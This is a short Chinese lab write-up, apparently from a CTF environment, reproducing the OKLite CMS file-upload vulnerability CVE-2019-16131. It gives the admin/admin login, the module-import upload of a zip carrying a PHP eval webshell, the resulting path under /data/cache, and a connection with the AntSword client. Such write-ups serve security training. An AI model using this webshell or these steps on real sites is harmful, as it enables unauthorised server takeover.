oklite 文件上传 (CVE-2019-16131)漏洞复现

1.漏洞描述

         请使用chrome内核浏览器访问,点击某菜单可能多次跳转登录页面,系镜像bug,多登录几次即可 若通过webshell文件管理访问/tmp获取的flag错误,请使用虚拟终端手动跳转/tmp查看 锟铻科技 OKLite是中国锟铻科技公司的一套基于PHP的企业建站内容管理系统(CMS)。 锟铻科技 OKLite v1.2.25版本中的framework/admin/modulec_control.php文件存在代码问题漏洞,该漏洞源于ZIP归档文件的.php文件可以写入到/data/cache/。攻击者可利用该漏洞上传任意文件。

2.后台登录,密码为admin,admin

http://202.194.97.206:26948/admin.php

6945c22385c842c68a37b2efde93390e.png

3.模块管理-模块导入,导入test.zip,包含test.php,测试1.zip不行。

<?php @eval($_POST['cmd']);?>

94a954091b784b199452043bb127735d.png

3. 文件解析路径是:http://ip:26948/data/cache/test.php,直接蚁剑连接

0c84eafb8c884b4dab5b3cf126b191d8.png

 

 

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值